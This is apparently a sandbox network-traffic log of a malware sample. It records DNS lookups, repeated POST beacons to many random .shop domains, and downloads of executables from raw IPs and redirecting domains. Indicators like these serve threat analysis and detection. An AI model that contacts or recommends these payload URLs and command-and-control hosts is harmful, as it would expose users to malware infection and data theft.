ETag: "6628152f-2b3600"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request56.132.233.193.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestaffordcharmcropwo.shopIN AResponseaffordcharmcropwo.shopIN A104.21.67.211affordcharmcropwo.shopIN A172.67.181.34
-
Remote address:104.21.67.211:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: affordcharmcropwo.shop
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=j4k845a3smrad0839shs51fpi5; expires=Thu, 29-Aug-2024 16:12:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Cmkax29RNy4tweI4L3PASkJCSc6wf2VanjJcH2jH6QW2YLvf0Nd85clb5smQIv%2FMf6XIgvI4Tv4GEVQzGvYI%2FtkafLf%2FS%2F%2F5kG2W9vH9ucDrpcDWGUxNJKGCxTlUq0Yey80AJV1ZVC3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425e9b855dc97-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.67.211:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: affordcharmcropwo.shop
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=qiva4g9emfchio04ptm121m2b4; expires=Thu, 29-Aug-2024 16:12:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lbf4GGpnV2V804tAsxihECrMBHkC8WKVgRev3sxZDAMZBETS3MwX7wNX3f1ayMnC42Coid006%2Bf0S%2BWHzu%2FB%2FDPTQnmrry7i5YoUkrPX%2B%2BngiW%2Bz13TOF%2Brg3MeFpeg2jPaH2rp7VDhT"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425f50beedc97-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestcleartotalfisherwo.shopIN AResponsecleartotalfisherwo.shopIN A104.21.72.132cleartotalfisherwo.shopIN A172.67.185.32
-
Remote address:104.21.72.132:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: cleartotalfisherwo.shop
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=prp467mqgckciksgc78t15s7vg; expires=Thu, 29-Aug-2024 16:12:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KoQotaLIhDPuC6Q%2FPqNs%2B0Lws2UX%2FhyeYfgDtWLXwBAiInpV84ct6IfvQbdnQqANL3wYLb2pN5gDCXiofd1puYQO%2FC15JE1Bu02q%2BjobbRYQpObb%2BERChonWj9%2Bh0DqKwqPurfblYaliw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425ec4e3d250e-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestworryfillvolcawoi.shopIN AResponseworryfillvolcawoi.shopIN A104.21.44.125worryfillvolcawoi.shopIN A172.67.199.191
-
Remote address:104.21.44.125:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: worryfillvolcawoi.shop
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ih4snnrtbq029ipnmdh88bscen; expires=Thu, 29-Aug-2024 16:12:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SctJG0EWr1s0FwToajkzm1HtDT9GDtmw%2FG%2Fs5J8qAVluFUIKxZzCragpfzwhW%2BoJJ6HdSfBawvzxIPr6S1kgyBc1PtTEiDM7ZsinbEpItkZzYYjlTw1mhLJJe3ZKsHBbu3rntIozWXD5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425ee9a5652bd-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request211.67.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request80.121.18.2.in-addr.arpaIN PTRResponse80.121.18.2.in-addr.arpaIN PTRa2-18-121-80deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request132.72.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestenthusiasimtitleow.shopIN AResponseenthusiasimtitleow.shopIN A172.67.183.226enthusiasimtitleow.shopIN A104.21.18.233
-
Remote address:172.67.183.226:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: enthusiasimtitleow.shop
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=46pndf28s32rhp3meqrrol5n6s; expires=Thu, 29-Aug-2024 16:12:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eI%2Fsh1b3B6TVW255gMa0OA%2BCHLq0CkcHFAu2Jl05BP5OI%2BEOdJUfn4a2NOR18H1vvQSsZfhuviEauh8EORxCBQwd08Kjnbr4KXIhGcqo8WSJsSz%2Bixc7J85lElLB2DfRyFHhpK%2F%2FXcrnRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425f108797755-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestdismissalcylinderhostw.shopIN AResponsedismissalcylinderhostw.shopIN A104.21.22.160dismissalcylinderhostw.shopIN A172.67.205.132
-
Remote address:104.21.22.160:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: dismissalcylinderhostw.shop
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=fi7jqqjmvgtl10dffdl25rm6b5; expires=Thu, 29-Aug-2024 16:12:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ecV2H5n4PW8mv33gReHv1tbRuwFJp7XsjpfAfwIjYWfc1LkVfu6GkSd0nF0Ndr8Qfjyv%2FKZRUz84cLlohFV%2BoMNnGz8n1ISAwItI5rLrRA2TJV5SAyijWnIiol%2F7XjaOqYWhBILujd3c%2BRMAacw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425f3ae679523-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request125.44.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request226.183.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request160.22.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestdiskretainvigorousiw.shopIN AResponsediskretainvigorousiw.shopIN A104.21.23.143diskretainvigorousiw.shopIN A172.67.211.165
-
Remote address:104.21.23.143:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: diskretainvigorousiw.shop
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ut64s1ahhpkic1cdl4buogp96e; expires=Thu, 29-Aug-2024 16:12:25 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4WZRjzikAgOkOqztJnGtW8twjTH2c%2FoZdN8q3zHKhFjfCIw8k%2FD%2FcTQKpiq7oBEKEUqhPNDM%2FNDr2rrXid2X%2BFEFs2JKu8LAsnAM5F7%2Fthe5sgEwdhCPXRlROOuJ7%2FpXtvAoMcWYtkwjwjh%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425f7592f532a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:193.233.132.234:80RequestGET /files/file300un.exe HTTP/1.1
Host: 193.233.132.234
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sun, 05 May 2024 08:06:02 GMT
ETag: "66890-617b06c84a0a2"
Accept-Ranges: bytes
Content-Length: 419984
Content-Type: application/x-msdownload
-
Remote address:8.8.8.8:53Requestcommunicationgenerwo.shopIN AResponsecommunicationgenerwo.shopIN A172.67.166.251communicationgenerwo.shopIN A104.21.83.19
-
Remote address:172.67.166.251:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: communicationgenerwo.shop
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=bhcjgpt2ai989jcoe3iaa9ti54; expires=Thu, 29-Aug-2024 16:12:25 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKljyrsG5j41Z03hEs3s8%2Ftk4U1%2F3tvlQNxv4ZTqZc%2FBPdnWdjTVgb67mDwuBKcz63mkVW1qeTG8icq24%2FRX2IaQdzGEE12cvtudDp7%2FoBeGMzNq2iPEw9fLldymOREzfku5v3wVuVzOkmkI"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425fa9b65889e-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request67.113.215.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request143.23.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestpillowbrocccolipe.shopIN AResponsepillowbrocccolipe.shopIN A104.21.47.56pillowbrocccolipe.shopIN A172.67.144.218
-
Remote address:104.21.47.56:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: pillowbrocccolipe.shop
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=p6inpv2htjo92ue9frutaak6ep; expires=Thu, 29-Aug-2024 16:12:26 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7a%2FhgrD%2FkPupMtUysh7cEQWPoUVzmYb2jtiwwKNQzuWNxPMf0aLzMDmPVhv3HO9AkJqhx7J%2BxUfwqBndvWbDunMLi9mxvvlE4kpMM4943JBvkaBqtCiQs96S5cwV6QQLh%2BEKzEi5HsFb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f425fd1e2a9439-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request56.47.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request251.166.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request234.132.233.193.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestzippyfinickysofwps.shopIN AResponsezippyfinickysofwps.shopIN A104.21.39.216zippyfinickysofwps.shopIN A172.67.148.231
-
Remote address:104.21.39.216:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: zippyfinickysofwps.shop
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=o1ger3vi1innf0hpgqptf2j451; expires=Thu, 29-Aug-2024 16:12:29 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MV2dbR9ndtsn3jd5h449WYHBZQCXZ12%2FmfHofVxTKn%2FXSqqxL0C84VBE1nvBkrIj%2BNKaYAQh6CRf4oxnKLaOMQBusezqrc%2F%2FPhvXsMX6tq4fXpraJfoUpmauQamC4P3GLRhg3OSHnuzwBg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f426119eaf941b-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestyip.suIN AResponseyip.suIN A104.21.79.77yip.suIN A172.67.169.89
-
Remote address:8.8.8.8:53Requestpastebin.comIN AResponsepastebin.comIN A104.20.4.235pastebin.comIN A172.67.19.24pastebin.comIN A104.20.3.235
-
Remote address:104.20.4.235:443RequestGET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 459
Last-Modified: Sun, 05 May 2024 22:18:11 GMT
Server: cloudflare
CF-RAY: 87f42613adef940d-LHR
-
Remote address:104.21.79.77:443RequestGET /RNWPd.exe HTTP/1.1
Host: yip.su
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
memory: 0.36199188232421875
expires: Sun, 05 May 2024 22:25:50 +0000
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
Cache-Control: max-age=14400
CF-Cache-Status: EXPIRED
Last-Modified: Sun, 05 May 2024 22:23:46 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BEVt764WAkLqzK8sYmBWwd1ASPMkr93Y%2B6ZVCNOa9t32PfbuKhP8sKtCDDObxP3AVElQW0uRH%2BRYGsVTBncmlK4GPTy00BDFS%2B1vZaX7AiXo11a8RFN5TzY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f42613ca9223d8-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestacceptabledcooeprs.shopIN AResponseacceptabledcooeprs.shopIN A172.67.180.137acceptabledcooeprs.shopIN A104.21.59.156
-
Remote address:172.67.180.137:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: acceptabledcooeprs.shop
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=dfoae07eaar38dk4u48qhfp9g4; expires=Thu, 29-Aug-2024 16:12:29 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iCbCZESpIXx%2BjY2Nn9y6tnhk7FvmZgbJQUcn1kqVp4iPSPlh4P0gElLrAd4Y%2F%2FZ8Bo0GXEOEVyjUGzs8V3z5%2B96dtJ%2FatcQXB0a0YzSaIeiGEQautkAHgu1aKH6Bkb996rBgNROVJ17vfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f42614694776f0-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request216.39.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request235.4.20.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request77.79.21.104.in-addr.arpaIN PTRResponse
-
Remote address:185.172.128.59:80RequestGET /ISetup5.exe HTTP/1.1
Host: 185.172.128.59
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 05 May 2024 22:15:01 GMT
ETag: "68201-617bc48bc604f"
Accept-Ranges: bytes
Content-Length: 426497
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Requestonlycitylink.comIN AResponseonlycitylink.comIN A104.21.18.166onlycitylink.comIN A172.67.182.192
-
Remote address:193.233.132.175:80RequestGET /server/ww12/AppGate2103v01.exe HTTP/1.1
Host: 193.233.132.175
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:50 GMT
Content-Type: application/octet-stream
Content-Length: 5725464
Last-Modified: Sun, 05 May 2024 10:41:08 GMT
Connection: keep-alive
ETag: "66376244-575d18"
Accept-Ranges: bytes
-
Remote address:193.233.132.234:80RequestGET /files/setup.exe HTTP/1.1
Host: 193.233.132.234
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sun, 05 May 2024 06:37:39 GMT
ETag: "63aba2-617af307316c9"
Accept-Ranges: bytes
Content-Length: 6532002
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
-
Remote address:193.233.132.234:80RequestGET /files/setup.exe HTTP/1.1
Host: 193.233.132.234
-
Remote address:193.233.132.234:80RequestGET /files/loader-2841.exe HTTP/1.1
Host: 193.233.132.234
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Content-Length: 301
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
Remote address:8.8.8.8:53Requestrealdeepai.orgIN AResponserealdeepai.orgIN A172.67.193.79realdeepai.orgIN A104.21.90.14
-
Remote address:8.8.8.8:53Requestnic-it.nlIN AResponsenic-it.nlIN A189.232.19.193nic-it.nlIN A189.181.37.206nic-it.nlIN A190.146.112.188nic-it.nlIN A123.212.43.225nic-it.nlIN A187.225.176.41nic-it.nlIN A109.98.58.98nic-it.nlIN A186.112.12.58nic-it.nlIN A217.219.131.81nic-it.nlIN A186.182.55.44nic-it.nlIN A187.134.46.246
-
Remote address:172.67.193.79:443RequestGET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: realdeepai.org
Connection: Keep-Alive
ResponseHTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://jonathantwo.com/6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FDyYNM207wfhLkLJV%2BptqFLKmA%2FptRGGta4ODD%2B1gldd8luuLbToe2Uk1RoTgyeYomIRxaYlYtCJT6LffxOr145RXERAdQP%2FD4Kx7k5AOMIo7%2FGhQmqw7col59ptfYMedA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f426151bfc9520-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.193.79:443RequestGET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: realdeepai.org
Connection: Keep-Alive
ResponseHTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://jonathantwo.com/6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FCO%2F6aK4TtyrJFh0Gu3wdKZWUREi9W8N27Ghgx6hi%2FLUsMNWJQmJk8Ji4ScEmKr7d2dD9WjuVRrJ8mvcT8VNDT71eP1i%2BDI43NNMqETAVoyo6w%2BCIuyp6FU0WtQYbNzMMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f42615191f76f9-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.18.166:443RequestGET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: onlycitylink.com
Connection: Keep-Alive
ResponseHTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://firstfirecar.com/6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sjJFohCszWTJvd9FhnAIs4Okny81C%2Bmb5eaQQzwFfMlfEC%2Br12J73d8i%2FC8gehkUu5VEz2ZZALIC2%2BtZAiOqmXVNNPgCSOHWD6sCM%2BZZ8c91mWU4B2BAbm%2BzVy%2F4EwMPZ3jt"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f426151e296401-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.18.166:443RequestGET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: onlycitylink.com
Connection: Keep-Alive
ResponseHTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://firstfirecar.com/6998c6a8d4954ef9ee79e698cdc0836d/baf14778c246e15550645e30ba78ce1c.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m%2BoHjopHmgVYZZcRHanCf9cux8%2BSxu2xKC%2B8zPUa4r5mRFzv0z1Sdog2jjYWkBBQrR2cRrph0Eb28VD5ALpZJSlN0TWOSsDeXd5DUATzcQTx2ngYSOs2qn527kMPSVEeVLvN"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f426151c9571aa-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestobsceneclassyjuwks.shopIN AResponseobsceneclassyjuwks.shopIN A172.67.192.5obsceneclassyjuwks.shopIN A104.21.20.88
-
Remote address:8.8.8.8:53Requestjonathantwo.comIN AResponsejonathantwo.comIN A104.21.31.124jonathantwo.comIN A172.67.176.131
-
Remote address:8.8.8.8:53Requestfirstfirecar.comIN AResponsefirstfirecar.comIN A104.21.60.76firstfirecar.comIN A172.67.193.220
-
Remote address:172.67.192.5:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: obsceneclassyjuwks.shop
-
GEThttps://jonathantwo.com/6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exeregsvcs.exeRemote address:104.21.31.124:443RequestGET /6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: jonathantwo.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4361112
Connection: keep-alive
Last-Modified: Sun, 05 May 2024 21:54:26 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 134
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bqoREgfHrf9T29vfUsKG7O2FGaY%2FpGeuyGSt1V8qTR79HzbuTKprtVwcV93VNOiTmTUu%2BX4G6R8ns08Ij2MBrapUXgBQye9K5UWaXuHu3dMXKP%2BnaLBzLkV3yvUJ6vysQtQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87f42616c9d248ce-LHR
alt-svc: h3=":443"; ma=86400
-
GEThttps://jonathantwo.com/6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exeregsvcs.exeRemote address:104.21.31.124:443RequestGET /6998c6a8d4954ef9ee79e698cdc0836d/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: jonathantwo.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4361112
Connection: keep-alive
Last-Modified: Sun, 05 May 2024 21:54:26 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 134
Accept-Ranges: bytes
